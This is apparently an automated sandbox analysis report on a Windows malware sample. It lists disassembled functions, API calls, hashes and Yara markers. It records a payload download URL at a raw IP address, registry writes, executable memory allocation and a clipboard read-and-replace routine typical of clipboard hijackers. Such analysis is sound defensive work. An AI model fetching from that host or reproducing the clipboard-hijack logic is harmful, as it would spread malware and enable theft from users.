                                                    • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                    • __dosmaperr.LIBCMT ref: 0042E170
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                    • String ID:
                                                    • API String ID: 2744730728-0
                                                    • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                    • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                    • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                    • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8
                                                    Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 550 434755-43476d call 439921 553 434780-434796 SetFilePointerEx 550->553 554 43476f-434774 call 42eac9 550->554 556 4347a7-4347b1 553->556 557 434798-4347a5 GetLastError call 42ea93 553->557 559 43477a-43477e 554->559 558 4347b3-4347c8 556->558 556->559 557->559 563 4347cd-4347d2 558->563 559->563
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                    • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                    • __dosmaperr.LIBCMT ref: 0043479F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                    • String ID:
                                                    • API String ID: 2336955059-0
                                                    • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                    • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                    • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                    • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98
                                                    Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 564 402bad-402bd9 RegCreateKeyExW 565 402bdb-402bed RegSetValueExW 564->565 566 402bef-402bf2 564->566 565->566 567 402bf4-402bf7 RegCloseKey 566->567 568 402bfd-402c03 566->568 567->568
                                                    APIs
                                                    • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                    • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateValue
                                                    • String ID:
                                                    • API String ID: 1818849710-0
                                                    • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                    • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                    • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                    • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664
                                                    Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 569 42e074-42e081 call 431f5e 572 42e083-42e086 ExitThread 569->572 573 42e08c-42e094 569->573 573->572 574 42e096-42e09a 573->574 575 42e0a1-42e0a7 574->575 576 42e09c call 4354f6 574->576 578 42e0b4-42e0ba 575->578 579 42e0a9-42e0ab 575->579 576->575 578->572 581 42e0bc-42e0be 578->581 579->578 580 42e0ad-42e0ae CloseHandle 579->580 580->578 581->572 582 42e0c0-42e0ca FreeLibraryAndExitThread 581->582
                                                    APIs
                                                      • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                      • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                      • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                    • ExitThread.KERNEL32 ref: 0042E086
                                                    • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                    • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                    • String ID:
                                                    • API String ID: 1198197534-0
                                                    • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                    • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                    • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                    • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659
                                                    Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 583 40239e-4023ac 584 402561-402563 PostQuitMessage 583->584 585 4023b2-4023b7 583->585 586 402569-40256e 584->586 587 4023d0-4023d7 585->587 588 4023b9-4023cb DefWindowProcW 585->588 589 4023d9 call 401da4 587->589 590 4023de-4023e5 587->590 588->586 589->590 590->586 592 4023eb-40255f call 4010ba call 4029f4 590->592 592->586
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                    • PostQuitMessage.USER32(00000000), ref: 00402563
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: MessagePostProcQuitWindow
                                                    • String ID:
                                                    • API String ID: 3873111417-0
                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                    • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                    • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E
                                                    Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Sleep
                                                    • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                    • API String ID: 3358372957-3120454669
                                                    • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                    • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                    • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                    • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                    Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 0040298F
                                                    • __fassign.LIBCMT ref: 0040299F
                                                      • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                    • String ID:
                                                    • API String ID: 2843524283-0
                                                    • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                    • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                    • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                    • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                    Function 024F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000400,?,?,024F0223,?,?), ref: 024F0E19
                                                    • SetErrorMode.KERNEL32(00000000,?,?,024F0223,?,?), ref: 024F0E1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: a1355340812a76edfb87e8f37077e87cd166259ba3829630d5b4c7a92252a5d3
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: 52D01231545128B7D7402A94DC09BCE7B1CDF45B66F008011FB0DD9181C770954046E5
                                                    Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                    • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                    • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                    • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                    Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                    • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                    • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                    • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                    Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                    • String ID:
                                                    • API String ID: 323602529-0
                                                    • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                    • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                    • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                    • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                    Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog3_catch
                                                    • String ID:
                                                    • API String ID: 3886170330-0
                                                    • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                    • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                    • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                    • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                    Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __wsopen_s
                                                    • String ID:
                                                    • API String ID: 3347428461-0
                                                    • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                    • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                    • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                    • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                    Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                    • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                    • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                    • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                    Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                    • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                    • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                    • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                    Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw
                                                    • String ID:
                                                    • API String ID: 2005118841-0
                                                    • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                    • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                    • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                    • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                    Function 00404333 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Deallocate
                                                    • String ID:
                                                    • API String ID: 1075933841-0
                                                    • Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                    • Instruction ID: fec367d8aa59221bd54f7e77a34cd6e8baa5892bd02020f9b8e7ed08d49e55ed
                                                    • Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                    • Instruction Fuzzy Hash: 71D067B1518611CEE764DF69E444656B7E4EF04310B24492FE4D9D2694E6749880CB44
                                                    Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                    • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                    • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                    • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                    Function 00AF9C75 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00AF9CC6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_af9000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction ID: dd19d58b6f7e690099ee2bb766952ec5166c1fb7654b2dca783c6bf6bb81f4b2
                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction Fuzzy Hash: A1113C79A00208EFDB01DF98CA85E99BFF5AF08350F158094FA489B362D771EA50DF90

                                                    Non-executed Functions

                                                    Function 024F1942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 024F194D
                                                    • Sleep.KERNEL32(00001541), ref: 024F1957
                                                      • Part of subcall function 024FCE77: _strlen.LIBCMT ref: 024FCE8E
                                                    • OpenClipboard.USER32(00000000), ref: 024F1984
                                                    • GetClipboardData.USER32(00000001), ref: 024F1994
                                                    • _strlen.LIBCMT ref: 024F19B0
                                                    • _strlen.LIBCMT ref: 024F19DF
                                                    • _strlen.LIBCMT ref: 024F1B23
                                                    • EmptyClipboard.USER32 ref: 024F1B39
                                                    • GlobalAlloc.KERNEL32(00000002,00000001), ref: 024F1B46
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 024F1B70
                                                    • SetClipboardData.USER32(00000001,00000000), ref: 024F1B79
                                                    • GlobalFree.KERNEL32(00000000), ref: 024F1B80
                                                    • CloseClipboard.USER32 ref: 024F1BA4
                                                    • Sleep.KERNEL32(000002D2), ref: 024F1BAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                    • String ID: 4#E$i
                                                    • API String ID: 4246938166-2480119546
                                                    • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                    • Instruction ID: b1126ac48fd6b8fae4cd48a49e994cd6639031581c1e8c567baca201c0859cce
                                                    • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                    • Instruction Fuzzy Hash: EB511530C00785DAE311DFA4ED45BFD7774FF6A306F04522ADA09A2162FB709681CB69
                                                    Function 024F2361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 024F239C
                                                    • GetClientRect.USER32(?,?), ref: 024F23B1
                                                    • GetDC.USER32(?), ref: 024F23B8
                                                    • CreateSolidBrush.GDI32(00646464), ref: 024F23CB
                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024F23EA
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 024F240B
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 024F2416
                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 024F241F
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 024F2443
                                                    • SetBkMode.GDI32(?,00000001), ref: 024F24CE
                                                    • _wcslen.LIBCMT ref: 024F24E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                    • String ID:
                                                    • API String ID: 1529870607-0
                                                    • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                    • Instruction ID: e36fa8912aa6f79ead2a080dbf23a156a1b29f98dc63d38d233e1247361f0935
                                                    • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                    • Instruction Fuzzy Hash: E7710D72900218AFDB62DF64DD85FAEBBBCEB49751F0041A5F609E6151DA70AF80CF24
                                                    Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                    • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                    • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                    • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                    Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                    • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
